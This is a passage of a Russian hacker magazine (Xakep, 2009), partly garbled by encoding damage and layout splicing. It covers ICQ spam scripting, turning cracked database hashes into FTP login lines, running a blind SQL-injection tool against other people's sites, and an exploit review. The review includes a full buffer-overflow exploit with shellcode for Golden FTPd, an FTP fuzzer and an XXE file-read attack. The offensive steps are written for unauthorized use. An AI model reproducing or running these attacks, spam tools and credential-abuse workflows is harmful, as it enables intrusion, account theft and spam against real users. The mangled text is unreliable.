ICQ-спам становится все более актуальным. Это сложно не заметить, 

особенно, если тебе в асю ежедневно прилетает с десяток сообщений 

рекламного характера. Большинство качественных продуктов для подобных 

рассылок стоит денег, поэтому возникает вопрос: а не написать 

ли простенькую спамилку собственноручно? Например, на всеми нами 

любимом PHP. Думаешь, нереально? Ошибаешься, и сейчас я тебе это 

докажу: 

1. В своих начинаниях мы будем использовать специальный класс 

WebIcqLite.class.php, который ты сможешь найти на нашем DVD. 

2. Для успешного использования всех функций класса следует приинклудить 

оный в нашем скрипте — 

include('WebIcqLite.class.php'); 

3. В общем виде, в качестве примера рассмотрим скрипт от Pashkela: 

 

4. В файле icq.ini располагаются данные по уинам: 

uin = 123456 ; UIN, ñ êîòîðîãî ðàññûëàåì 

pass = 1234 ; Ïàðîëü äëÿ UIN, ñ êîòîðîãî ðàññûëàåì 

file_uin = uin.txt ; Ôàéë ñî ñïèñêîì UIN äëÿ ðàññûëêè 

message = test, do not reply this message, bot-test ; 

Ñîáñòâåííî, ñàìà ìåññàãà äëÿ îòñûëêè 

pause = 2 ; Ïàóçà ìåæäó êàæäûì ñîîáùåíèåì, ÷òîáû íàñ íå 

çàáàíèëè (â ñåêóíäàõ) 

5. А в файле uin.txt лежит список уинов, по которым будет проводиться 

рассылка. 

Как видишь, все достаточно просто. Тебе остается лишь изменить сорец 

на свое усмотрение либо накодить новый :). 

¹5 

ЗАДАЧА: ОТПАРСИТЬ ДАННЫЕ ИЗ PASSWORDPRO ДЛЯ ИСПОЛЬЗО- 

ВАНИЯ В FTP-ЧЕКЕРЕ 


Для брута самых разнообразных хешей часто приходится использовать 

популярную утилу PasswordPro. Прога довольно удобна и отменно работает 

на забугорных ломанных дедиках :). Проблема лишь в том, что каждый раз 

парсить вручную результаты брута — утомительно. Представь, что ты нашел 

SQL-инъекцию на крупном портале, слил имена и хеши MySQL-юзеров 

и отправил их на брут в PasswordPro. Брутер с задачей справился, пассы 

найдены, и было бы неплохо попробовать их на FTP. Вот тут и появляется 

много лишней работы, а именно — преобразование сбрученных данных 

из PasswordPro вида «admin:5ba686200919b19f:narym7» в стандартный 

формат фтп-чекеров вида «ftp://admin:narym7@127.0.0.1». Итак, поехали: 

1. Первое, что нам нужно сделать, — слить уже готовый парсер «Small 

parser for passwordpro» от evil_packman’а с нашего DVD :). 2. Теперь экспортируем 

уже сбрученные акки из PasswordPro в файл first.txt, например: 

web:5ba686200919b19f:nfgavr 

2. Вспоминаем, установлен ли у нас PHP. Если нет — срочно идем на Гугл 

и качаем (еще пригодится:)). 

3. Созданный ранее файл first.txt (с акками из брутера) кладем в одной 

директории с парсером. 

4. Запускаем скрипт: 

C:\php\php C:\parser.php first.txt out.txt 127.0.0.1, 

— где first.txt — файл с данными из PasswordPro, out.txt — файл с отпарсенными 

аккаунтами, а 127.0.0.1 — IP ftp-сервера. 

5. На выходе рядом с парсером обнаруживаем файл out.txt с cодержимым: 

Парсим данные из PasswordPro 

admin:5ba686200919b19f:narym7 

news:5ba686200919b19f:wens6 

root:5ba686200919b19f:sawbdv 

swin:5ba686200919b19f:zasut4 

040 

XÀÊÅÐ 04 /124/ 09

взлом 

ftp://admin:narym7@127.0.0.1 

ftp://news:wens6@127.0.0.1 

ftp://root:sawbdv@127.0.0.1 

ftp://swin:zasut4@127.0.0.1 

ftp://web:nfgavr@127.0.0.1 

Все, теперь берем любой функциональный фтп-чекер и проверяем 

аккаунты к FTP. 

¹7 

• main.php — ñàì ñêðèïò 

• config.php — ôàéë ñ íàñòðîéêàìè ñêðèïòà 

• lib_and_data/grey_data.php — ñòàíäàðòíûé ñëîâàðèê ñ 

èìåíàìè òàáëèö è êîëîíîê 

• lib_and_data/function.php — áèáëèîòåêà ôóíêöèé äëÿ 

ðàáîòû ñî ñëåïûìè sql-èíúåêöèÿìè 

• dic/grey_table_name.txt — ñòàíäàðòíûé ñëîâàðèê ñ èìåíàìè 

òàáëèö 

• dic/grey_field_name.txt — äåôîëòîâûé ñëîâàðü ñ èìåíàìè 

êîëîíîê 

ЗАДАЧА: АЛЬТЕРНАТИВНЫМ СПОСОБОМ УЗНАТЬ ОС НА СЕТЕВОМ 

УРОВНЕ 


Как ты уже знаешь, Blind SQL-Injections представляют собой слепые 

SQL-инъекции, работа с которыми максимально затруднена. Если конкретнее, 

то раскручивать подобные баги ручками — дело неблагодарное. 

Поэтому, идея автоматизации процесса возникла давно и была успешно 

реализована в нескольких проектах, одним из которых мы и воспользуемся. 

Использовать будем скрипт от товарища Grey’я, ибо утила специально 

заточена под работу со слепыми скул-инъектами и мускулом. Из 

полезных фич скрипта следует отметить: 

• Âûâîä ñòàíäàðòíîé èíôîðìàöèè: version(), user(), 

database(), ïðè mysql >= 3 âåðñèè. 

• Ïîäáîð èìåí òàáëèö ïî âñòðîåííîé áàçå èìåí ëèáî ïî óêàçàííîìó 

ñëîâàðþ, ïðè mysql >= 4.1 âåðñèè. 

• Ïîäáîð íàçâàíèé êîëîíîê ê óêàçàííîé òàáëèöå ïî âñòðîåííîé 

áàçå èìåí êîëîíîê ëèáî ïî óêàçàííîìó ñëîâàðèêó, ïðè 

mysql >= 4.1 âåðñèè. 

• Âûâîä ðåçóëüòàòà óêàçàííîãî çàïðîñà, ïðè mysql >= 4.1 

âåðñèè. 

• Âûâîä ñîäåðæèìîãî óêàçàííîãî ôàéëà, ïðè íàëè÷èè ñîîòâåòñòâóþùèõ 

ïðàâ â mysql >= 3 âåðñèè. 

• Îïðåäåëåíèå äëèíû ðåçóëüòàòà óêàçàííîãî çàïðîñà, îñîáåííî 

ïîëåçíî ïðè âûâîäå ÷àñòè ñîäåðæèìîãî êàêîãî-ëèáî 

ôàéëà, ðàáîòàåò â mysql >= 4.1 âåðñèè. 

• Îïðåäåëåíèå èìåí òàáëèö è èìåí ÁÄ, â êîòîðûõ îíè íàõîäÿòñÿ 

ñ ïîìîùüþ information_schema.tables â mysql => 5 

âåðñèè. 

• Îïðåäåëåíèå èìåí êîëîíîê ê óêàçàííîé òàáëèöå, íàõîäÿùåéñÿ 

â óêàçàííîé ÁÄ, ñ ïîìîùüþ information_schema. 

columns â mysql => 5 âåðñèè. 

• Ñîïîñòàâëåíèå èìåí òàáëèö è èìåí ÁÄ, â êîòîðûõ îíè íàõîäÿòñÿ 

ñ ïîìîùüþ information_schema.tables â mysql => 5 

âåðñèè. 

• Ïîèñê äàííûõ â ôàéëàõ; ïî äåôîëòó èç ôàéëîâ âûäåëÿþòñÿ 

òàêèå äàííûå, êàê: 

• ïåðåìåííûå, êîòîðûå ìîãóò ñîäåðæàòü ïàðîëü; 

• ïåðåìåííûå, êîòîðûå ìîãóò ñîäåðæàòü äàííûå äëÿ ïîäêëþ- 

÷åíèÿ ê ÑÓÁÄ. 

• Âûâîä ñòàíäàðòíîé èíôîðìàöèè â PostgreSQL: version(), 

current_user(), current_database(). 

• Ïîäáîð èìåí òàáëèö â PostgreSQL. 

3. Заливаем все вышеперечисленные файлы на наш (или не совсем 

наш) хост. 

4. Выставляем чмод на запись для каталога, в котором находятся скрипты 

config.php и main.php. 

5. Отредактируем config.php. Особое внимание надо уделить основным 

параметрам: 

$host = ''; // Àäðåñ ñàéòà 

$port = ; // Ïîðò 

$path = ''; // Ïóòü äî óÿçâèìîãî ñêðèïòà (íà÷èíàÿ ñ ‘/’) 

$vars = ""; // Ïåðåìåííûå (èëè ñîäåðæèìîå ÊÓÊÎÂ, åñëè 

sql-èíúåêöèÿ â ÊÓÊÀÕ): âíà÷àëå íåóÿçâèìûå ïåðåìåííûå ñ 

èõ çíà÷åíèÿìè, 

// à çàòåì, â êîíöå, óÿçâèìàÿ ïåðåìåííàÿ, âìåñòå ñ ñóùåñòâóþùèì 

çíà÷åíèåì, ÌÎÆÅØÜ óêàçàòü êàâû÷êó, åñëè îíà 

íóæíà 

$strend = ''; // Ñèìâîë êîììåíòàðèÿ ('--+', '/*', '#'), 

åñëè íóæåí 

$method = ; // (öèôðà): ìåòîä îòïðàâêè äàííûõ 

// 0 — POST; èíúåêöèÿ â ïåðåìåííîé òèïà POST 

// 1 — GET; èíúåêöèÿ â ïåðåìåííîé òèïà GET 

// 2 — GET/COOKIE; èíúåêöèÿ â COOKIE 

$type = ; // (0 èëè 1): òèï ðàñïîçíàíèÿ ïðàâèëüíîñòè âûïîëíåíèÿ 

sql-çàïðîñà: 

// 0 — ïðàâèëüíîñòü çàïðîñà îïðåäåëÿåòñÿ ïî íàëè÷èþ 

òåêñòà, êîòîðûé äîëæåí ïîÿâëÿòüñÿ òîëüêî ïðè óêàçàííîì 

çíà÷åíèè óÿçâèìîé ïåðåìåííîé 

// 1 — ïðàâèëüíîñòü çàïðîñà îïðåäåëÿåòñÿ ïî îòñóòñòâèþ 

òåêñòà (òåêñòà îøèáêè), êîòîðàÿ äîëæíà ïîÿâëÿòüñÿ ïðè 

íåïðàâèëüíîì âûïîëíåíèè çàïðîñà 

$text = ‘’; // Òåêñò, ïî êîòîðîìó áóäåò îïðåäåëÿòüñÿ ïðàâèëüíîñòü 

âûïîëíåíèÿ çàïðîñà 

6. Перейди в браузере по линку http://хост/каталог/main.php. 

7. Ждем 30 секунду, при отсутствии каких-либо ошибок — закрываем 

браузер и надеемся на лучшее. 

8. Через несколько часов смотрим результат в файле result.txt. 

Кстати! Помни, что время работы скрипта напрямую зависит от ширины 

канала твоего сервера, а также от нагрузки на атакуемую СУБД. z 

Конфигурируем инструмент для работы с Blind SQL-Injections 

Теперь рассмотрим алгоритм действий по установке, настройке и запуску 

утилы: 

1. Сливаем архив с тулзой с нашего DVD. 

2. Распаковываем архив, проверяем содержимое: 

XÀÊÅÐ 04 /124/ 09 

041

взлом 

обзор 

эксплоитов 

обзор 


обзор 


АНДРЕЙ «SKVOZ» КОМАРОВ 

обзор 


обзор 


обзор 


обзор 


обзор 


обзор 


01 

МЕЖСАЙТОВЫЙ 

СКРИПТИНГ 

В WORDPRESS MU 

>> Brief 

Wordpress MU — версия известного блогосферного продукта, предназначенного 

для организации бесчисленного числа блогов на одном 

движке (а также — на одном сервере). Уязвимость была найдена в функции 

choose_primary_blog (в составе wp-includes/wpmu-functions.php). 

Рассмотрим код сего творения. 

1830 function choose_primary_blog() { 

1831 global $current_user; 

1832 ?> 

1833 

1834 

1835 

1836 

1837 

1852 

1853 

1854 

1855

обзор 


обзор 


обзор 


>> взлом 

>> Targets: 

Wordpress MU < 2.7 

>> Exploit 

$ curl -H "Cookie: " -H «Host: " 

http://www.example.com/wp-admin/profile.php> tmp.html 

$ firefox tmp.html 

if (n < 0) 

{ 

fprintf (stderr, "failed i386_get_ldt(): %d\n", n); 

return (EXIT_FAILURE); 

} 

num_desc = n; 

printf ("i386_get_ldt: num_desc: %d\n", num_desc); 

>> Solution 

Производитель уже уведомлен о наличии бреши, но реакции пока не наблюдается 

(÷èòàé îäíîèìåííóþ ñòàòüþ â íàøåé ðóáðèêå è ïîéìåøü, 

÷òî WordPress ñëàâèòñÿ äàëåêî íå åäèíîé áðåøüþ, — Ïðèì. Forb). 

APPLE MACOS X XNU > Brief 

Множественные целочисленные переполнения в функциях Apple MacOS 

позволяют с помощью специального системного вызова i386_set_ldt или 

i386_get_ldt повысить привилегии локальных пользователей. Нетрудно 

сделать вывод, что уязвимость может быть эксплуатированной исключительно 

на Intel-based машинах. Не вдаваясь в подробности, скажу, что 

подобного рода уязвимость была обнаружена аж в 2005 году во FreeBSD 

(и нечему тут удивляться, ведь Unix-архитектура обеих систем консервативна). 

Такой же баг был найден и сравнительно недавно, но уже в 

MacOS. Напомню, что существует три вида таблиц дескрипторов: глобальная 

таблица (одна в системе — GDT), локальная таблица (может быть 

своя для каждой задачи), а также таблица дескрипторов прерываний. 

Локальная таблица (LDT) содержит только дескрипторы сегментов, шлюзов 

задачи и вызовов. Сегмент недоступен задаче, если его дескриптора 

нет ни в LDT, ни в GDT (потому что локальная дескрипторная таблица 

описывается дескриптором глобальной таблицы). Основа виртуальной 

памяти системы Pentium состоит из двух таблиц: LDT и GDT. 

Функция i386_get_ldt возвращает список дескрипторов, задействованных 

в LDT (Local Descriptor Table) в текущий момент. Базовый синтаксис 

вызова описывается следующей функцией: 

#include 

#include 

int i386_get_ldt (int start_sel, union descriptor 

*descs, int num_sels); 

Сообщив параметр экстремально большого размера, можно допустить 

копирование памяти ядра в пользовательское окружение. 

>> Targets 

Apple Mac OS X > Solution 

Сейчас как раз идет активное обсуждение решения. 

02 

FULL DISCLOSURE 

МНОГОЧИСЛЕННЫЕ УЯЗВИМОСТИ В 

FTP-СЕРВЕРАХ. 

>> Brief 

Одна из самых распространенных проблем безопасности будет отражена 

в этой заметке, а именно — fuzzing FTP-серверов. Сам процесс 

Вместо win32_exec payload’a мы могли бы выбрать что-нибудь более 

опасное, например, организацию удаленного шелла 

>> Exploit 

http://milw0rm.com/exploits/8108 

Ключевые фрагменты привожу ниже: 

#define TMP_FILE "/tmp/xnu-get_ldt" 

#define READ_SIZE 0x2000000 

int 

main (int argc, char **argv) 

{ 

int fd, n, num_desc; 

void *ptr; 

n = i386_get_ldt (0, ((int)NULL) + 1, 0); 

XÀÊÅÐ 04 /124/ 09 

043

взлом 

обзор 


обзор 


обзор 


обзор 


Эксплуатация уязвимости привела к исполнению calc.exe без ведома 

пользователя 

фаззинга не раз уже описывался на страницах журнала: по сути, это 

умышленное общение с сервисом с помощью аномальных запросов. 

Вспомним, что на самом деле FTP-протокол очень емок и насчитывает 

более ста команд. Соответственно, разработчики должны учесть их все 

в своих приложениях (а это очень трудоемкая задача) — устанавливать 

ограничение на вводимую длину создаваемой папки, контролируемую 

глубину пути и так далее. Для автоматизации процесса багоискатели 

пишут либо собственные скрипты, либо полноценные приложения, 

вроде Infigo FTP Fuzz (infigo.hr/files/ftpfuzz.zip). Как правило, подобного 

рода уязвимости эксплуатируются после авторизации. Для этого 

можно заюзать anonymous-доступ, из-под которого и осуществлять 

проверки. Сюжет прост — фаззером сообщаются различные данные, 

а параллельно мы осуществляем мониторинг поведения приложения 

(OllyDbg). Порой приложение не дает себя дебажить и конфликтует с 

«Olly». Чтобы решить проблему, попробуй использовать альтернативный 

отладчик. FaultMon (research.eeye.com/html/tools/RT20060801-4. 

html) — утилита для выявления экспешнов в приложении и их корректной 

работы. 

Для аттача процесса в OllyDbg можно воспользоваться соответствующей 

вкладкой или использовать флаг -P (с указанием PID процесса). 

Аналогичный флаг присутствует и в FaultMon. Рассмотрим процесс 

анализа Golden FTPd. Аттачим процесс к дебаггеру и начинаем фаззинг 

по всем параметрам. Так как сервис привязан к запуску «внутри» 

Olly, для более качественной отладки после креша предстоит играться 

с Debug > Restart. Из-за переполнения входных данных по команде 

USER мы выявили переполнение буфера, и значение EIP перезаписалось 

на 41414141. 

Путем замеров выясняем, что переполнили буфер 3000 байтами. Далее 

требуется передать управление на шелл-код путем изменения адреса 

возврата. Кликаем правой кнопкой мыши в окне OllyDbg: Overflow 

Return Address ASCII Overflow returns Search JMP/Call ESP. Когда 

эта процедура завершена, палим View Log, чтобы отследить расположение 

«jmp esp», «call esp» в процессе и связанных DLL. 

Теперь View Executable Modules — и по базе OpCodeDB в Metasploit 

определяем адрес возврата: 0x750362c3 — ws2_32.dll (opcode — 

pop,pop.ret). Обнаружили, что данный адрес содержит pop,pop.ret. 

Так как они нужны нам, прибавляем единицу к адресу возврата, чтобы 

пропустить одну из команд pop (0x750362c4). 

Мы можем воспользоваться готовым шелл-кодом win32_exec из пакета 

Metasploit (payloads): 

"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8" 

"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1" 

"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07" 

"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25" 

"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5" 

044 

Переполнение буфера привело к перезаписи регистра EIP 

"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d" 

"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4" 

"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0" 

"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c" 

"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b" 

"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4" 

# (3000 bytes) 

sc = 'A' * 3000 

# calc.exe Shellcode(172 bytes) 

sc += "\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8" 

sc += "\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1" 

sc += "\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07" 

sc += "\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25" 

sc += "\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5" 

sc += "\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d" 

sc += "\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4" 

sc += "\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0" 

sc += "\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c" 

sc += "\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b" 

sc += "\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4" 

# Windows 2000 SP0,1,2,3,4 (pop,pop,ret+1)= (pop,ret) 

# Thanks Metasploit! 

return_address='\xC5\x2A\x02\x75’ 

buffer = '\xEB\x30' + ' /' + sc + return_address + '\r\n\r\n' 

print buffer 

Эксплойт готов! После его запуска и отправки соответствующего 

содержимого мы получим удаленное исполнение calc.exe на целевой 

машине. 

Устройство самого фаззера можно понять на простом примере. 

Воспользуемся вспомогательным средством antiparser (antiparser. 

sourceforge.net) — это API, которое написано на Python и позволяет 

создать специальные блоки данных для применения в фаззерах. Что 

же представляют собой эти блоки? 

apChar() — âîñüìèáèòíûé ñèìâîë 

apCString() — ñòðîêà (êàê â ÿçûêå Ñ), ñîñòîÿùàÿ èç çíàêîâ 

è çàêàí÷èâàþùàÿñÿ íóëåâûì ñèìâîëîì 

apKeywords() — ñïèñîê ïàðàìåòðîâ, îòäåëåííûõ äðóã îò 

XÀÊÅÐ 04 /124/ 09

обзор 


обзор 


обзор 


>> взлом 

обзор 


Схема работы FTP-протокола 

äðóãà ñïåöèàëüíûì ñèìâîëîì èëè äðóãèì áëîêîì äàííûõ 

apLong() — 32-áèòíîå öåëîå 

apShort() — 16-áèòíîå öåëîå 

apString() — ïðîèçâîëüíàÿ ñòðîêà (aka «free form 

string») 

Наиболее интересен тип apKeywords(). Последовательность, задаваемая 

им выглядит так: [ключевое слово (например, команда FTP)] 

[разделитель][блок данных (параметры к команде)][символ конца 

блока]. Применительно к FTP можно сделать такой набросок: 

# èìïîðòèðóåì âñå ôóíêöèè èç ìîäóëÿ 

From antiparser import * 

# çàäàåì ñïèñîê êîìàíä â êà÷åñòâå êëþ÷åâûõ ñëîâ òèïà 

ñïèñîê 

CMDLIST = ['ABOR', ‘ALLO', 'APPE', 'CDUP', 'XCUP', 

'CWD', 'XCWD', 'DELE', 'HELP', 'LIST', 'MKD', 'XMKD', 

'MACB’, 'MODE', 'MTMD', 'NLST', 'NOOP', 'PASS', ‘PASV', 

'PORT', 'PWD', 'XPWD', 'QUIT', 'REIN', 'RETR', 'RMD', 

'XRMD', 'REST', 'RNFR', 'RNTO', 'SITE', 'SIZE', 'STAT’, 

'STOR', 'STRU', 'STOU', 'SYST', 'TYPE', 'USER'] 

# çàäàåì ñèìâîë ðàçäåëèòåëÿ è çàâåðøàþùåãî çíàêà 

SEPARATOR = "" 

TERMINATOR = "\r\n" 

for cmd in CMDLIST: 

# èíèöèàëèçèðóåì API 

Ap = antiparser() 

# íàñòðàèâàåì íà ðåæèì ñî ñâîèìè êëþ÷åâûìè ñëîâàìè 

cmdkw = apKeywords() 

# çàäàåì ñëîâà, ðàçäåëèòåëü è çàâåðøàþùèé ñèìâîë 

cmdkw.setKeywords([cmd]) 

cmdkw.setSeparator(SEPARATOR) 

cmdkw.setTerminator(TERMINATOR) 

# ÷åì áóäåì ôàççèòü, â êà÷åñòâå ïàðàìåòðîâ ê êîìàíäàì 

XÀÊÅÐ 04 /124/ 09 

База опкодов Metasploit 

cmdkw.setContent(r»%n%n%n%n%n%n%n%n%n%n%n%») 

# äåëàåì òàê, ÷òîáû ãåíåðèðóåìûå áëîêè äàííûõ âàðüèðîâàëèñü 

ïî ðàçìåðó ñ íàðàñòàíèåì äî 65536 áàéò 

cmdkw.setMode('incremental') 

cmdkw.setMaxSize(65536) 

045

взлом 

обзор 


обзор 


обзор 


03 

NEXTAPP 

ECHO XML 

INJECTION 

>> Brief: 

Одна из неочевидных и интересных атак. Пример сценария: от клиента 

отправляются XML-данные, поступают на сторону приложения, где 

обрабатываются XML-парсером. 

Типичный запрос: 

С помощью таких инструментов, как Http-Analyzer или плагин к Mozilla 

Tamper Data, очень удобно проводить атаки на заголовки 

aa 

ap.append(cmdkw) 

# øëåì âñþ êàðòèíó íà óêàçàííûé õîñò è ïîðò ñ ïîìîùüþ 

ñîêåòîâ 

sock = apSocket() 

sock.connect(HOST, PORT) 

print sock.recv(1024) 

sock.sendTCP(ap.getPayload()) 

print sock.recv(1024) 

sock.close 

Отмечены все доступные методы для «общения». Тестирование выявило 

затруднения при обработке CWD/CDUP. «Access violation» представляет 

ситуацию, когда приложение пытается прочитать участок памяти, которого 

не существует (характерная ошибка — «Read of»). Вторая ошибка связана 

с записью в участок памяти («Write to») , который был недоступен, либо 

приложение не имело привилегий для записи. Для отслеживания такого 

рода ошибок требуется выставить флажки в OllyDbg (Options Debugging 

Options Exceptions) «Memory Access Violation», «Single Step Break». 

>> Targets 

Выявленные таким способом уязвимости: 

• WinFTP 2.3.0 

Передача аномального параметра в команде LIST (LIST *). Позволяет 

перезаписать arbitary-память (http://milw0rm.com/exploits/7875). 

• GuildFTPd FTP Server Version 0.x.x 

Обход ограничения безопасности по команде DELETE (http://milw0rm. 

com/exploits/8200). 

Может быть осуществлено с применением техник directory traversal ( \..). 

• WFTPD Explorer Pro 1.0 

Переполнение кучи (http://milw0rm.com/exploits/7913). 

• Serv-U 7.4.0.1 

Неавторизированное создание произвольных директорий (http:// 

milw0rm.com/exploits/8211). 

Вдобавок, следует понимать, что неразумное использование 

экстремально больших параметров иногда приводит к отказу в 

обслуживании сервиса. Этот продукт, к сожалению, не исключение. 

При сообщении большого числа (свыше 2000) команд SMNT 

после авторизации — происходит аварийное завершение работы 

сервиса. 

046 

Вредоносный запрос: 

]> 

Интересность в том, что языковыми средствами языка XML злоумышленник 

может продекларировать новый объект. Тот, в свою очередь, 

объявит объект, содержащий boot.ini, на который можно будет сослаться 

в XML-запросе. 

>> Targets 

NextApp Echo < 2.1.1 

>> Exploits 

http://milw0rm.com/exploits/8191 

Код запроса представлен выше, инжект такого XML-request’a может 

быть выполнен с помощью средств JS/HTTP-POST. 

04 

УЯЗВИМОСТИ В ФУНКЦИЯХ FTS_* 

В LIBC (HTTP://MILW0RM.COM/ 

EXPLOITS/8163). 

Здесь мы видим некорректную обработку исключительных ситуаций 

при длинном пути. Набор функций fts занимается отображением 

иерархии файловой системы UNIX — ftp_open() возвращает хэндл на 

файловую иерархию, и он может быть «скормлен» одной из следующих 

функций: 

• fts_read — возвращает указатель на структуру, описывающую один 

из элементов файловой иерархии; 

• fts_children() возвращает указатель на список структур, каждая из 

которых описывает один из файлов внутри дочерней директории. 

Обратимся к структуре, описывающей иерархию: 

typedef struct _ftsent { 

unsigned short fts_info; /* ôëàãè íà FTSENT-ñòðóêòóðó*/ 

char *fts_accpath; /* ïóòü äîñòóïà */ 

char *fts_path; /* òåêóùèé êàòàëîã */ 

size_t fts_pathlen; /* strlen(fts_path) */ 

char *fts_name; /* èìÿ ôàéëà */ 

size_t fts_namelen; /* strlen(fts_name) */ 

short fts_level; /* ãëóáèíà èåðàðõèè (-1 äî N) */ 

XÀÊÅÐ 04 /124/ 09

обзор 


обзор 


>> взлом 

int fts_errno; /* èñêëþ÷åíèÿ */ 

long fts_number; /* íóìåðîâàííîå çíà÷åíèå */ 

void *fts_pointer; /* ëîêàëüíûé àäðåñ â ïàìÿòè */ 

struct _ftsent *fts_parent; /* ðîäèòåëüñêàÿ äèðåêòîðèÿ 

*/ 

struct _ftsent *fts_link; /* ñëåäóþùàÿ ôàéëîâàÿ 

ñòðóêòóðà */ 

struct _ftsent *fts_cycle; /* ñòðóêòóðà èåðàðõèè ïî 

öèêëó */ 

struct stat *fts_statp; /* ñòàòèñòèêà ïî ôàéëàì 

èåðàðõèè */ 

} FTSENT; 

Заметим, что fts_level имеет тип short. Это наводит на определенные 

мысли. При изучении кода взгляд натыкается на комментарий 

разработчиков: 

- ---line-616-625--- 

/* 

* Figure out the max file name length that can 

be stored in the 

* current path -- the inner loop allocates 

more path as necessary. 

* We really wouldn’t have to do the maxlen 

calculations here, we 

* could do them in fts_read before returning 

the path, but it’s a 

* lot easier here since the length is part of 

the dirent structure. 

* 

* If not changing directories set a pointer so 

that can just append 

* each new name into the path. 

*/ 

- ---line-616-625--- 

«По правде говоря, мы не будем здесь делать какие-либо вычисления 

с огромными именами... и здесь должен быть уровень 

ограничений или «pathlen»-монитор». Конечно, должен, но где 

же он? Безусловно, недоработка, а точнее недоделка. 

#define NAPPEND(p)\ 

(p->fts_path[p->fts_pathlen — 1] == ‘/’ \ 

? p->fts_pathlen — 1 : p->fts_pathlen) 

Естественно, эта функция пойдет в креш, если мы обратимся к неправильному 

участку памяти с помощью аномальных параметров. 

127# pwd 

/home/cxib 

# êîëè÷åñòâî ðîäèòåëüñêèõ êàòàëîãîâ î÷åíü âåëèêî 

127# du /home/ 

4 /home/cxib/.ssh 

Segmentation fault (core dumped) 

127# rm -rf Samotnosc 


127# chmod -R 000 Samotnosc 


>> Targets 

• OpenBSD 4.4 (/usr/src/lib/libc/gen/fts.c) 

• Microsoft Interix 6.0 10.0.6030.0 x86 

• Microsft Vista Enterprise (SearchIndexer.exe) z 

XÀÊÅÐ 04 /124/ 09 

47

взлом 

BID 

Secunia 

OSVDB 

АНДРЕЙ «SKVZ» КОМАРОВ 


МЕРЯЕМ 

УЯЗВИМОСТИ 

ISS X-Force 

КЛАССИФИКАТОРЫ И МЕТРИКИ КОМПЬЮТЕРНЫХ БРЕШЕЙ 

Åæåäíåâíî ñîòíÿìè õàêåðîâ îáíàðóæèâàþòñÿ òûñÿ÷è óÿçâèìîñòåé, — ïîñëå 

÷åãî âçëàìûâàåòñÿ êó÷à ñàéòîâ, è äåòàëè áàãîâ âûêëàäûâàþòñÿ â áàãòðàê íà 

âñåîáùåå îáîçðåíèå. Íàâåðíÿêà, òû ÷èòàë ïîäîáíûå îáçîðû è çàìå÷àë, ÷òî 

êàæäûé áàã îïðåäåëåííûì îáðàçîì êëàññèôèöèðóåòñÿ. ×òî ñîáîé ïðåäñòàâëÿåò 

èçìåðåíèå óÿçâèìîñòè, ïî êàêèì êðèòåðèÿì ïðîèçâîäèòñÿ è íà êîé 

÷åðò ýòî âîîáùå íóæíî çíàòü? Îòâåòû òû íàéäåøü â ýòîé ñòàòüå. 

>> взлом 

«Общепринятых систем по классификации 

брешей в нашей стране не существует» — эту 

фразу я поставлю во главу угла. Продвинутым 

государством в этом плане стали США. Там 

ведут несколько классификаций и активно используют 

их как в образовательном процессе, 

так и в технологиях. Одной из самых известных 

систем классификации является CVE, которая 

курируется компанией NCSD (National Cyber 

Security Division) при одном из Министерств 

США. Рассмотрим эту систему подробнее. 

СVE (COMMON VULNERABILITIES AND 

EXPOSURES) 

По сути, CVE — это «словарь» известных уязвимостей, 

имеющий строгую характеристику 

по описательным критериям, что отличает его, 

скажем, от Bugtrack-ленты. Полностью CVE 

можно отыскать в Национальной Базе Уязвимостей 

США (NVD — nvd.nist.gov) или на официальном 

сайте (cve.mitre.org/data/downloads). 

Причем, распространяется база в нескольких 

форматах: xml, html, csf, xsd schema. Из-за 

такой доступности, открытости и удобства к 

базе CVE часто обращаются сами разработчики 

различного ПО (в первую очередь, нацеленного 

на рынок информационной безопасности). 

Общий вид записи CVE выглядит примерно так: 

CVE ID, Reference è Description. 

ID записывается с указанием кода и порядкового 

номера, например «CVE-1999-03». В поле 

Reference записываются различного рода 

ссылки на патчи, рекомендательного рода 

документы или комментарии разработчика. 

Description отвечает за описание самой уязвимости. 

Короче, CVE — система широкого профиля 

и никоим образом не сосредотачивается 

только на клиентских уязвимостях или, скажем, 

исключительно на WEB-протоколе. Изначально 

она задумывалась как единый стандарт 

идентификации уязвимостей, который должен 

охватывать несколько звеньев информационной 

системы: систему поиска и обнаружения 

брешей (например, сканер безопасности), 

антивирусное ПО, а также исследуемое ПО. Как 

